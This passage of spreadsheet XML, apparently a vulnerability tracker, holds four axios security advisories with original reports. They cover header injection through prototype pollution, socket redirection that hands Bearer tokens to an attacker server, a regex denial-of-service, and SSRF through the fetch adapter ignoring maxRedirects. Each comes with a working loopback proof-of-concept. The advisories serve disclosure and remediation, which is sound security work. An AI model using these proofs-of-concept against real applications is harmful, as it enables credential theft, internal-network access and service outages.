      <c r="K180" s="5" t="inlineStr"/>
      <c r="L180" s="5" t="inlineStr">
        <is>
          <t>npm:axios</t>
        </is>
      </c>
      <c r="M180" s="5" t="inlineStr">
        <is>
          <t>1.20.0</t>
        </is>
      </c>
      <c r="N180" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O180" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P180" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q180" s="5" t="inlineStr"/>
      <c r="R180" s="5" t="inlineStr"/>
      <c r="S180" s="5" t="inlineStr">
        <is>
          <t>## Summary
Axios request interceptors may return a replacement config object. If an interceptor returns a plain object without an own `headers` property, `dispatchRequest()` later evaluates `config.headers` and can resolve an inherited `Object.prototype.headers` value. In a process where another vulnerability has polluted `Object.prototype.headers`, axios can send attacker-controlled headers.
Axios does not create the prototype pollution source, and the interceptor itself is trusted caller code. The vulnerable behavior is the post-interceptor axios config read that reopens a prototype-pollution gadget after earlier null-prototype config hardening.
## Impact
An attacker with a prior same-process prototype-pollution primitive can inject headers into affected axios requests when the application uses an interceptor that rebuilds config and omits headers. Depending on the target service, injected headers can affect cache behavior, conditional requests, metadata services, or application-specific authorization and routing logic.
The issue is conditional and should not be described as affecting every interceptor or every request.
## Affected Functionality
Affected:
- Request interceptor chains where an interceptor returns a new ordinary object.
- Replacement config objects that omit an own `headers` property.
- `dispatchRequest()` header normalization through `AxiosHeaders.from(config.headers)`.
Not affected:
- Requests whose interceptor preserves an own `headers` property.
- Interceptors that mutate and return the existing null-prototype config.
- Processes without prototype pollution.
## Technical Details
`lib/core/dispatchRequest.js` contains:
```js
config.headers = AxiosHeaders.from(config.headers);
```
The initial merged config is null-prototype, but an interceptor can replace it with a normal object. If that object has no own `headers`, the read can resolve `Object.prototype.headers`.
Local verification on axios `1.18.1` polluted `Object.prototype.headers = { 'X-Poisoned': 'yes' }`, installed an interceptor that returned `{ url, method, timeout, proxy: false }`, and sent a request. The loopback server received `X-Poisoned: yes`.
## Proof of Concept of Attack
Constrained local demonstration:
```js
Object.prototype.headers = { 'X-Poisoned': 'yes' };
const client = axios.create();
client.interceptors.request.use((config) =&gt; ({
  url: config.url,
  method: config.method,
  timeout: config.timeout
}));
await client.get(url);
```
Expected safe behavior is that missing headers normalize to an empty header set. Current affected behavior reads inherited `Object.prototype.headers`.
## Workarounds
Interceptors that rebuild config should always set an own `headers` property, for example by preserving `config.headers` or setting `headers: {}`. Mutating and returning the existing merged config also avoids replacing the null-prototype object.
&lt;details&gt;
  &lt;summary&gt;&lt;h3&gt;Original report&lt;/h3&gt;&lt;/summary&gt;
## Summary
Axios 1.17.0 blocks the old `Object.prototype.common` header bucket gadget. However, if a request interceptor rebuilds a minimal config object and omits `headers`, `dispatchRequest()` reads inherited `Object.prototype.headers`.
This allows attacker-controlled headers to be placed on the wire.
## Affected Version
Validated on:
- axios: `1.17.0`
- commit: `4306df2`
- runtime: Node.js `v24.15.0`
## Preconditions
- A separate prototype-pollution primitive can write an object to `Object.prototype.headers`.
- A request interceptor rebuilds config and omits own `headers`.
## Root Cause
`dispatchRequest()` uses:
```js
config.headers = AxiosHeaders.from(config.headers);
```
If `config` is a normal object returned by an interceptor and lacks own `headers`, this reads `Object.prototype.headers`.
## Impact
An attacker can inject request headers. Depending on the target service, this can cause cache manipulation, conditional-response suppression, request smuggling preconditions, metadata-service header injection, or application-specific authorization bypass.
## Proof of Concept
```js
import axios from './index.js';
import http from 'http';
const start = (handler) =&gt; new Promise((resolve) =&gt; {
  const server = http.createServer(handler);
  server.listen(0, '127.0.0.1', () =&gt; resolve(server));
});
const stop = (server) =&gt; new Promise((resolve) =&gt; server.close(resolve));
const hits = [];
const server = await start((req, res) =&gt; {
  hits.push(req.headers);
  res.setHeader('Content-Type', 'application/json');
  res.end('{"ok":true}');
});
try {
  Object.prototype.headers = {
    'X-Poisoned': 'yes',
    'If-None-Match': '*'
  };
  const client = axios.create();
  client.interceptors.request.use((config) =&gt; ({
    url: config.url,
    method: config.method,
    timeout: config.timeout
  }));
  await client.get(`http://127.0.0.1:${server.address().port}/headers`, {
    timeout: 3000
  });
  console.log(hits[0]);
} finally {
  delete Object.prototype.headers;
  await stop(server);
}
```
Observed wire headers:
```json
{
  "x-poisoned": "yes",
  "if-none-match": "*",
  "user-agent": "axios/1.17.0"
}
```
## References
- https://github.com/axios/axios/security/advisories/GHSA-898c-q2cr-xwhg
- https://osv.dev/vulnerability/GHSA-898c-q2cr-xwhg
&lt;/details&gt;
---</t>
        </is>
      </c>
      <c r="T180" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101904</t>
        </is>
      </c>
    </row>
    <row r="181">
      <c r="A181" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B181" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C181" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101905</t>
        </is>
      </c>
      <c r="D181" s="5" t="inlineStr"/>
      <c r="E181" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F181" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G181" s="5" t="inlineStr"/>
      <c r="H181" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I181" s="5" t="inlineStr"/>
      <c r="J181" s="5" t="inlineStr">
        <is>
          <t>npm, axios</t>
        </is>
      </c>
      <c r="K181" s="5" t="inlineStr"/>
      <c r="L181" s="5" t="inlineStr">
        <is>
          <t>npm:axios</t>
        </is>
      </c>
      <c r="M181" s="5" t="inlineStr">
        <is>
          <t>1.20.0</t>
        </is>
      </c>
      <c r="N181" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O181" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P181" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q181" s="5" t="inlineStr"/>
      <c r="R181" s="5" t="inlineStr"/>
      <c r="S181" s="5" t="inlineStr">
        <is>
          <t>## Summary
Axios' Node HTTP adapter can act as a read-side prototype-pollution gadget for Node's sensitive `createConnection` request option. The adapter creates a null-prototype options object, but Node's HTTP client can copy or normalize request options into ordinary objects before connection creation. If `Object.prototype.createConnection` has been polluted elsewhere in the same process, Node can call the inherited function and create a socket to an attacker-controlled endpoint.
Axios does not create the prototype pollution source. The vulnerability is that axios does not set an own safe value for a sensitive transport option before handing options to Node.
## Impact
Given a prior same-process prototype-pollution primitive, an attacker can redirect later axios Node HTTP requests at the socket layer while the request URL and axios config still appear to target the legitimate origin. The attacker-controlled endpoint can receive request headers and bodies, including Authorization headers, cookies, API keys, and service credentials, and can return attacker-controlled responses to the application.
This can bypass application destination validation that checks the URL before calling axios, because the URL remains legitimate while the underlying socket goes elsewhere.
## Affected Functionality
Affected:
- Node.js HTTP adapter.
- HTTP and HTTPS request paths that rely on Node/follow-redirects option processing and do not set an own safe `createConnection`.
- Processes where `Object.prototype.createConnection` is polluted.
Not affected:
- Browser adapters.
- Processes without prototype pollution.
- Requests using a custom trusted transport that ignores inherited `createConnection` and sanitizes options internally.
## Technical Details
`lib/adapters/http.js` creates:
```js
const options = Object.assign(Object.create(null), {
  path,
  method,
  headers,
  agents: { http: httpAgent, https: httpsAgent },
  auth,
  protocol,
  family,
  beforeRedirect: dispatchBeforeRedirect,
  beforeRedirects: Object.create(null),
  http2Options,
});
```
The object does not include an own `createConnection` property. Local verification on axios `1.18.1` polluted `Object.prototype.createConnection` to connect to an attacker loopback server. A request to a legitimate loopback server with an Authorization header returned the attacker's response; the legitimate server received no request and the attacker server received `Bearer SECRET`.
## Proof of Concept of Attack
Constrained local demonstration:
```js
Object.prototype.createConnection = function (_options, cb) {
  const socket = net.createConnection({ host: '127.0.0.1', port: attackerPort }, () =&gt; {
    if (typeof cb === 'function') cb(null, socket);
  });
  return socket;
};
await axios.get('http://127.0.0.1:&lt;legit-port&gt;/secret', {
  headers: { Authorization: 'Bearer SECRET' },
  proxy: false
});
```
Expected safe behavior is that the legitimate server receives the request. Current affected behavior lets the attacker server receive the request and return the response.
## Workarounds
Run axios in a process where prototype pollution is not present. For high-risk internal clients, use a custom trusted transport or agent layer that sets and enforces its own connection creation behavior instead of allowing inherited Node request options to participate.
&lt;details&gt;
  &lt;summary&gt;&lt;h3&gt;Original report&lt;/h3&gt;&lt;/summary&gt;
## Summary
Axios' Node HTTP adapter remains exploitable as a read-side prototype-pollution gadget after the recent null-prototype hardening. This is not a claim that axios creates the prototype pollution source. The precondition is a separate upstream prototype pollution primitive in the same Node.js process.
When `Object.prototype.createConnection` is polluted, axios requests can be redirected to an attacker-controlled socket even though the adapter builds the request options with `Object.create(null)`. The request URL and axios config still appear to target the legitimate host, but the actual socket is attacker-controlled.
This allows credential exfiltration and response manipulation for later axios HTTP requests in a polluted process.
## Impact
Given an upstream prototype pollution primitive in the same process, an attacker can turn later axios HTTP requests into a man-in-the-middle primitive:
- redirect the underlying socket for axios requests to attacker-controlled infrastructure
- receive headers and request bodies intended for the legitimate target, including bearer tokens, cookies, API keys, and service credentials
- return attacker-controlled responses to the caller
- bypass application SSRF controls that validate the URL before calling axios, because the requested URL remains legitimate while the socket connects elsewhere
The important boundary here is axios' documented/read-side prototype-pollution hardening. The project threat model discusses polluted `Object.prototype` from transitive dependencies as an in-scope read-side gadget class where axios should avoid picking up inherited behavior-changing properties. This issue is a bypass of that hardening at the Node HTTP request-options boundary.
## Technical details
The HTTP adapter constructs a null-prototype request options object before calling the selected transport:
```js
const options = Object.assign(Object.create(null), {
  path,
  method: method,
  headers: toByteStringHeaderObject(headers),
  agents: { http: config.httpAgent, https: config.httpsAgent },
  auth,
  protocol,
  family,
  beforeRedirect: dispatchBeforeRedirect,
  beforeRedirects: Object.create(null),
  http2Options,
});
```
That prevents direct inherited reads while the options object remains null-prototype. However, Node's HTTP client path copies or normalizes request options into ordinary objects before connection creation. After that copy, missing properties can resolve from `Object.prototype` again.
`createConnection` is a sensitive Node HTTP option. If it is inherited after this copy, Node calls the attacker-supplied function to create the socket.
## Reproduction
The following minimal proof uses a legitimate target server and an attacker server. It pollutes `Object.prototype.createConnection`, then makes an axios request to the legitimate server with an Authorization header.
```js
import net from 'node:net';
import http from 'node:http';
import axios from 'axios';
function listen(handler) {
  return new Promise(resolve =&gt; {
    const s = http.createServer(handler);
    s.listen(0, '127.0.0.1', () =&gt; resolve(s));
  });
}
const legitHits = [];
const attackerHits = [];
const legit = await listen((req, res) =&gt; {
  legitHits.push({url: req.url, auth: req.headers.authorization || null});
  res.end('LEGIT');
});
const attacker = await listen((req, res) =&gt; {
  attackerHits.push({url: req.url, auth: req.headers.authorization || null});
  res.end('ATTACKER');
});
Object.prototype.createConnection = function(options, cb) {
  const sock = net.createConnection({
    host: '127.0.0.1',
    port: attacker.address().port,
  }, () =&gt; {
    if (typeof cb === 'function') cb(null, sock);
  });
  return sock;
};
const res = await axios.get(`http://127.0.0.1:${legit.address().port}/secret`, {
  headers: {Authorization: 'Bearer SECRET'},
  proxy: false,
});
console.log({
  response: res.data,
  legitHits,
  attackerHits,
});
```
Observed result on the current npm package:
```json
{
  "response": "ATTACKER",
  "legitHits": [],
  "attackerHits": [
    {
      "url": "/secret",
      "auth": "Bearer SECRET"
    }
  ]
}
```
The request never reached the intended target. The attacker-controlled server received the Authorization header and supplied the response body returned by axios.
## Versions tested
I reproduced this against:
- axios 1.16.1 from npm
- axios 1.17.0 from npm
- current `v1.x` source at commit `a8e4f13aeecc45a3b8fab3ecfd9ddb5d70fb772b`
## Fix validation
Adding an own safe value for `createConnection` to the adapter options object prevents inherited pollution from being observed after Node's option copy:
```js
const options = Object.assign(Object.create(null), {
  path,
  method: method,
  headers: toByteStringHeaderObject(headers),
  agents: { http: config.httpAgent, https: config.httpsAgent },
  auth,
  protocol,
  family,
  beforeRedirect: dispatchBeforeRedirect,
  beforeRedirects: Object.create(null),
  http2Options,
  createConnection: undefined,
});
```
With that guard in place, the same proof no longer calls the polluted function. The legitimate server receives the request, the attacker server receives nothing, and axios returns the legitimate response.
## Remediation
Set own safe defaults for sensitive Node HTTP request options before calling `transport.request`, at minimum:
```js
createConnection: undefined
```
I recommend reviewing other sensitive Node HTTP options that may be read after Node copies the request options into a normal object, especially connection/TLS-affecting fields such as `lookup`, `timeout`, `localAddress`, `servername`, `signal`, and related options.
&lt;/details&gt;
---</t>
        </is>
      </c>
      <c r="T181" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101905</t>
        </is>
      </c>
    </row>
    <row r="182">
      <c r="A182" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B182" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C182" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101906</t>
        </is>
      </c>
      <c r="D182" s="5" t="inlineStr"/>
      <c r="E182" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F182" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G182" s="5" t="inlineStr"/>
      <c r="H182" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I182" s="5" t="inlineStr"/>
      <c r="J182" s="5" t="inlineStr">
        <is>
          <t>npm, axios</t>
        </is>
      </c>
      <c r="K182" s="5" t="inlineStr"/>
      <c r="L182" s="5" t="inlineStr">
        <is>
          <t>npm:axios</t>
        </is>
      </c>
      <c r="M182" s="5" t="inlineStr">
        <is>
          <t>1.20.0</t>
        </is>
      </c>
      <c r="N182" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O182" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P182" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q182" s="5" t="inlineStr"/>
      <c r="R182" s="5" t="inlineStr"/>
      <c r="S182" s="5" t="inlineStr">
        <is>
          <t>## Summary
Axios `shouldBypassProxy()` normalizes hostnames with `hostname.replace(/\.+$/, '')`. For a hostname shaped as many dots followed by a non-dot, the anchored regex can perform quadratic backtracking. Because axios re-evaluates proxy bypass rules for redirected requests, a malicious server can trigger this synchronous work through a crafted redirect `Location`.
The issue affects Node.js applications that use environment proxy variables with `NO_PROXY` and allow redirects.
## Impact
An attacker-controlled server can return a redirect whose hostname causes the axios process to spend significant CPU time in synchronous hostname normalization. During this time, the Node.js event loop is blocked and the application cannot handle other work on that thread.
This is an availability-only issue. It does not disclose request data or modify requests.
## Affected Functionality
Affected:
- Node.js HTTP adapter.
- Environment proxy handling through `HTTP_PROXY` or `HTTPS_PROXY`.
- `NO_PROXY` or `no_proxy` set to a non-empty value.
- Redirects followed by axios or `follow-redirects`.
Not affected:
- Browser adapters.
- Requests with `proxy: false`.
- Requests with no `NO_PROXY` value.
- Requests with `maxRedirects: 0`, unless application code manually follows the malicious redirect and re-enters axios.
## Technical Details
`lib/helpers/shouldBypassProxy.js` contains:
```js
return unmapIPv4MappedIPv6(hostname.replace(/\.+$/, ''));
```
When the hostname is `"." * n + "a"`, the `$` anchor causes the regex engine to retry the dot run from many positions before it fails. `setProxy()` invokes `shouldBypassProxy(location)` after `getProxyForUrl(location)` returns a proxy, including on redirect hops via `beforeRedirects.proxy`.
Local timing on axios `1.18.1` showed increasing cost for crafted hostnames: about 1 ms at 1000 dots, 6.9 ms at 3000 dots, and 34.5 ms at 6000 dots. The growth is consistent with the submitted quadratic claim while avoiding long-running payloads.
## Proof of Concept of Attack
Constrained helper-level demonstration:
```js
import shouldBypassProxy from 'axios/lib/helpers/shouldBypassProxy.js';
process.env.NO_PROXY = 'example.com';
shouldBypassProxy('http://' + '.'.repeat(6000) + 'a/');
```
In the full adapter path, a malicious server can return that hostname in a `302 Location` header while the client has proxy environment variables and `NO_PROXY` configured.
## Workarounds
Disable automatic redirects for requests to untrusted servers, or avoid environment proxy handling for those requests with `proxy: false` when appropriate. Operators can also avoid broad untrusted redirect-following in services where event-loop availability is critical.
&lt;details&gt;
  &lt;summary&gt;&lt;h3&gt;Original report&lt;/h3&gt;&lt;/summary&gt;
### Summary
shouldBypassProxy normalizes a host with hostname.replace(/\.+$/, ''). On a host of the shape &lt;many dots&gt;&lt;non-dot&gt; (e.g. "." × 40000 + "a"), this anchored regex backtracks quadratically (O(N²)), synchronously starving the Node.js event loop. Because axios re-evaluates the proxy on every redirect using the new Location host, a malicious server can return a crafted 302 Location and freeze the client's event loop for seconds per redirect — a denial of service.
### Details
- Affected code: lib/helpers/shouldBypassProxy.js → normalizeNoProxyHost: hostname.replace(/\.+$/, '') (one pass in 1.18.1). The open PR #11029 adds a second /\.+$/ pass in normalizeIPAddress, doubling the cost (not the origin).
- Root cause: /\.+$/ is O(N²) on a long run of dots that is not at the end of the string — the $ anchor forces the engine to backtrack the entire dot-run from every start position.
- Trust boundary (per THREATMODEL): the redirect Location is untrusted (T-2: "axios to network … redirect Location … untrusted"). The caller requests a benign URL; the malicious host arrives via the server's 302. This is not the T-1 caller-supplied-URL non-goal.
- Call chain: setProxy(options, configProxy, location, isRedirect, …) (lib/adapters/http.js) → env-proxy branch → getProxyForUrl(location) returns a proxy → if (!shouldBypassProxy(location)) → normalizeNoProxyHost(parsed.hostname.toLowerCase()) runs /\.+$/. setProxy is re-invoked on the redirect hop with the untrusted Location; new URL() retains the long dot-run in .hostname.
- Preconditions: proxy configured via environment (HTTP_PROXY/HTTPS_PROXY, trusted per THREATMODEL T-3, common in CI/containers/enterprise) + NO_PROXY set + redirects followed (default maxRedirects: 5).
### PoC
Self-contained, no network — imports axios's own helper:
// node poc.mjs   (run next to an axios install)
import sbp from './node_modules/axios/lib/helpers/shouldBypassProxy.js';
process.env.NO_PROXY = 'example.com';
for (const n of [5000, 10000, 20000, 40000]) {
  const url = 'http://' + '.'.repeat(n) + 'a/';   // arrives as an untrusted 302 Location host
  const t0 = process.hrtime.bigint();
  sbp(url);                                         // returns false (correct no-bypass) — but O(N^2) slow
  console.log(`N=${n}: ${(Number(process.hrtime.bigint()-t0)/1e6)|0} ms`);
}
// Measured on 1.18.1: N=5000 ~43ms, 10000 ~160ms, 20000 ~618ms, 40000 ~2499ms; benign host ~0.05ms.
Driven through the real http-adapter __setProxy on the redirect path (setProxy(…, isRedirect=true)), a 10 ms timer fires 0 times during the ~2.4 s block at N=40000 — full event-loop starvation.
### Impact
Denial of service (event-loop starvation) on any axios client that uses an environment proxy with NO_PROXY set and follows redirects, when a server it contacts returns a crafted redirect Location. No data exposure or RCE. Same impact class as the accepted DoS advisories GHSA-62hf-57xw-28j9 (toFormData recursion) and the maxContentLength response-size DoS.
### Suggested fix
Replace the regex trailing-dot strip with a linear trim:
let end = hostname.length;
while (end &gt; 0 &amp;&amp; hostname.charCodeAt(end - 1) === 46 /* '.' */) end--;
hostname = hostname.slice(0, end);
Also drop the redundant second /\.+$/ pass in PR #11029's normalizeIPAddress.
&lt;/details&gt;
---</t>
        </is>
      </c>
      <c r="T182" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101906</t>
        </is>
      </c>
    </row>
    <row r="183">
      <c r="A183" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B183" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C183" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101907</t>
        </is>
      </c>
      <c r="D183" s="5" t="inlineStr"/>
      <c r="E183" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F183" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G183" s="5" t="inlineStr"/>
      <c r="H183" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I183" s="5" t="inlineStr"/>
      <c r="J183" s="5" t="inlineStr">
        <is>
          <t>npm, axios</t>
        </is>
      </c>
      <c r="K183" s="5" t="inlineStr"/>
      <c r="L183" s="5" t="inlineStr">
        <is>
          <t>npm:axios</t>
        </is>
      </c>
      <c r="M183" s="5" t="inlineStr">
        <is>
          <t>1.20.0</t>
        </is>
      </c>
      <c r="N183" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O183" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P183" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q183" s="5" t="inlineStr"/>
      <c r="R183" s="5" t="inlineStr"/>
      <c r="S183" s="5" t="inlineStr">
        <is>
          <t>## Summary
Axios exposes `maxRedirects` to limit redirect following, and `maxRedirects: 0` is used by applications as a redirect-based SSRF guard. The Node HTTP adapter enforces this option. The fetch adapter does not read it and does not set a Fetch API `redirect` mode, so the runtime default of `redirect: 'follow'` applies.
Applications are affected when they rely on `maxRedirects: 0` and use the fetch adapter, either explicitly or because the runtime selects it.
## Impact
An attacker who controls the initial URL or a redirecting server can cause a fetch-adapter request to follow a redirect even though the caller configured `maxRedirects: 0`. If the redirect target is reachable only from the application environment, this can expose internal responses or trigger state-changing internal endpoints.
This should not be described as unconditional SSRF. The bypass requires a redirect source, such as an attacker-controlled server or open redirect, and an application that trusted `maxRedirects: 0` as the redirect guard.
## Affected Functionality
Affected:
- `adapter: 'fetch'`.
- Runtime environments where fetch is selected by adapter resolution.
- Requests configured with `maxRedirects: 0` but without `fetchOptions.redirect: 'manual'` or equivalent runtime-specific redirect control.
Not affected:
- Node HTTP adapter, which enforces `maxRedirects: 0`.
- Requests that do not follow redirects in the underlying fetch implementation because the caller explicitly configured fetch redirect behavior.
## Technical Details
`lib/adapters/fetch.js` destructures many fields from `resolveConfig(config)`, but not `maxRedirects`. It then builds fetch options without a `redirect` key:
```js
const resolvedOptions = {
  ...fetchOptions,
  signal: composedSignal,
  method: method.toUpperCase(),
  headers: toByteStringHeaderObject(headers.normalize()),
  body: data,
  duplex: 'half',
  credentials: isCredentialsSupported ? withCredentials : undefined,
};
```
Because `redirect` is absent, the Fetch API default is to follow redirects.
Local verification on axios `1.18.1` showed the HTTP adapter throwing with `maxRedirects: 0`, while the fetch adapter followed the same loopback `302` and returned the internal response.
## Proof of Concept of Attack
Constrained local demonstration:
1. Start server A that returns `302 Location: http://127.0.0.1:&lt;server-b&gt;/internal`.
2. Start server B that returns `INTERNAL`.
3. Compare:
```js
await axios.get(serverA, { adapter: 'http', maxRedirects: 0 });  // throws
await axios.get(serverA, { adapter: 'fetch', maxRedirects: 0 }); // returns INTERNAL
```
## Workarounds
For fetch-adapter requests, set `fetchOptions: { redirect: 'manual' }` where the runtime supports it, or use the Node HTTP adapter for requests that rely on axios redirect limits.
&lt;details&gt;
  &lt;summary&gt;&lt;h3&gt;Original report&lt;/h3&gt;&lt;/summary&gt;
## Summary
Axios 1.17.0 exposes `maxRedirects` as a configuration option to limit redirect following, and setting it to `0` is a documented pattern for preventing redirect-based SSRF. The HTTP adapter enforces this via `follow-redirects`. The fetch adapter does not read `maxRedirects` at all - it passes requests to the underlying `fetch()` call with no `redirect` option, which defaults to `'follow'`, so redirects are followed by the runtime rather than being constrained by axios `maxRedirects`.
In the attached PoC, a request issued with `maxRedirects: 0` and `adapter: 'fetch'` follows a `302` redirect to an internal service and returns its response, while the same request with `adapter: 'http'` correctly throws. A second bypass case demonstrates that the redirect can reach a state-changing internal endpoint, not just read-only ones, proving both confidentiality and integrity impact.
This affects any application that sets `maxRedirects: 0` as a redirect guard and runs in an environment where the fetch adapter is active: Deno, Bun, Cloudflare Workers, or Node.js with `adapter: 'fetch'` set explicitly.
## Details
The fetch adapter destructures config fields from `resolveConfig` at `lib/adapters/fetch.js`:
```js
let {
  url, method, data, signal, cancelToken, timeout,
  onDownloadProgress, onUploadProgress, responseType,
  headers, withCredentials, fetchOptions,
  maxContentLength, maxBodyLength,
} = resolveConfig(config);
// maxRedirects is not extracted
```
The options object passed to `fetch()` has no `redirect` key:
```js
const resolvedOptions = {
  ...fetchOptions,       // redirect only set here if caller explicitly passes fetchOptions.redirect
  signal: composedSignal,
  method: method.toUpperCase(),
  headers: toByteStringHeaderObject(headers.normalize()),
  body: data,
  duplex: 'half',
  credentials: isCredentialsSupported ? withCredentials : undefined,
};
```
Because no `redirect` key is present, the Fetch API default of `redirect: 'follow'` applies, so redirects are handled by the runtime rather than constrained by axios `maxRedirects`. The HTTP adapter, by contrast, delegates to `follow-redirects`, which reads `maxRedirects`, enforces the cap, and strips `Authorization`, `Cookie`, and `Proxy-Authorization` on cross-origin redirects.
The discrepancy between adapters is not documented. The threat model covers credential stripping on redirects (T-R2) and cites `follow-redirects` as the mitigation, but makes no mention that the fetch adapter does not participate in this mitigation. See: https://github.com/axios/axios/blob/master/THREATMODEL.md#t-r2-credential-leakage-on-cross-origin-redirect
The behaviour difference between adapters is summarised below:
| Behaviour                              | HTTP adapter                    | Fetch adapter            |
|----------------------------------------|---------------------------------|--------------------------|
| Reads `config.maxRedirects`            | Yes                             | **No**                   |
| Enforces `maxRedirects: 0`             | Yes -- throws on any redirect   | **No -- follows silently**|
| Strips `Authorization` cross-origin    | Yes (`follow-redirects` &gt;=1.15.8)| Runtime-dependent       |
| Strips `Cookie` cross-origin           | Yes                             | Runtime-dependent        |
### When is the fetch adapter selected?
- **Deno, Bun, Cloudflare Workers:** no Node.js `http` module available; the adapter list falls through to `'fetch'`
- **Explicit config:** `axios.get(url, { adapter: 'fetch' })`
- **Custom adapter list:** `axios.create({ adapter: ['fetch'] })`
## PoC
```js
import http from 'http';
import axios from './index.js';
// Server A: the "trusted" external target, issues open redirects to Server B
const serverA = http.createServer((req, res) =&gt; {
  if (req.url === '/api/data') {
    res.writeHead(302, { Location: 'http://127.0.0.1:13802/internal/secrets' });
    return res.end();
  }
  if (req.url === '/api/change-config') {
    res.writeHead(302, { Location: 'http://127.0.0.1:13802/internal/admin/config' });
    return res.end();
  }
  res.writeHead(200, { 'Content-Type': 'application/json' });
  res.end(JSON.stringify({ ok: true }));
});
let internalHits = 0;
let internalConfig = {};
// Server B: the "internal" service, should be unreachable from the application
const serverB = http.createServer(async (req, res) =&gt; {
  internalHits++;
  if (req.url === '/internal/secrets') {
    res.writeHead(200, { 'Content-Type': 'application/json' });
    return res.end(JSON.stringify({
      secret: 'FAKE_AWS_SECRET_ACCESS_KEY_FOR_POC_ONLY',
      role:   'arn:aws:iam::000000000000:role/FakeProductionRole',
    }));
  }
  if (req.url === '/internal/admin/config') {
    internalConfig = { compromised: true, source: 'redirect-followed-by-fetch-adapter' };
    res.writeHead(200, { 'Content-Type': 'application/json' });
    return res.end(JSON.stringify({
      reached: 'state-changing internal admin endpoint',
      changed: true,
      internalConfig,
    }));
  }
  res.writeHead(404);
  res.end();
});
await Promise.all([
  new Promise((resolve, reject) =&gt; { serverA.listen(13801, '127.0.0.1', resolve); serverA.on('error', reject); }),
  new Promise((resolve, reject) =&gt; { serverB.listen(13802, '127.0.0.1', resolve); serverB.on('error', reject); }),
]);
const targetUrl    = 'http://127.0.0.1:13801/api/data';
const changeUrl    = 'http://127.0.0.1:13801/api/change-config';
const internalUrl  = 'http://127.0.0.1:13802/internal/secrets';
const internalCfg  = 'http://127.0.0.1:13802/internal/admin/config';
console.log('Axios maxRedirects bypass via fetch adapter PoC');
console.log(`axios VERSION=${axios.VERSION}`);
console.log(`maxRedirects=0`);
console.log(`Target URL=${targetUrl}`);
console.log(`  redirects to ${internalUrl}`);
console.log(`Change URL=${changeUrl}`);
console.log(`  redirects to ${internalCfg}`);
console.log('');
// CONTROL: HTTP adapter correctly enforces maxRedirects: 0
let httpBlocked = false;
try {
  await axios.get(targetUrl, { maxRedirects: 0, adapter: 'http' });
  console.log('[CONTROL]  HTTP adapter + maxRedirects:0  BUG: should have thrown');
} catch (err) {
  httpBlocked = true;
  console.log(`[CONTROL]  HTTP adapter + maxRedirects:0  correctly blocked redirect ✓ (${err.code ?? err.message})`);
}
console.log(`[CONTROL]  Internal hits after HTTP adapter: ${internalHits}`);
// BYPASS: Fetch adapter silently ignores maxRedirects: 0
let fetchResponse = null;
try {
  fetchResponse = await axios.get(targetUrl, { maxRedirects: 0, adapter: 'fetch' });
  console.log('[BYPASS]   Fetch adapter + maxRedirects:0  SSRF succeeded ✗');
  console.log('           Response:', JSON.stringify(fetchResponse.data));
} catch (err) {
  console.log('[BYPASS]   Fetch adapter + maxRedirects:0  redirect blocked (unexpected):', err.message);
}
console.log(`[BYPASS]   Internal hits after fetch adapter: ${internalHits}`);
// BYPASS: Fetch adapter follows redirect to state-changing internal endpoint
let changedResponse = null;
try {
  changedResponse = await axios.get(changeUrl, { maxRedirects: 0, adapter: 'fetch' });
  console.log('[BYPASS]   Fetch adapter state change:', JSON.stringify(changedResponse.data));
  console.log(`[BYPASS]   Internal hits after state change: ${internalHits}`);
} catch (err) {
  console.log('[BYPASS]   State change request blocked (unexpected):', err.message);
}
console.log('');
if (httpBlocked &amp;&amp; fetchResponse &amp;&amp; changedResponse) {
  console.log('POC RESULT: fetch adapter followed redirects despite maxRedirects:0,');
  console.log('            reaching internal service and mutating internal state.');
} else if (httpBlocked &amp;&amp; fetchResponse) {
  console.log('POC RESULT: fetch adapter followed redirect despite maxRedirects:0,');
  console.log('            reaching internal service that should have been unreachable.');
} else if (!httpBlocked) {
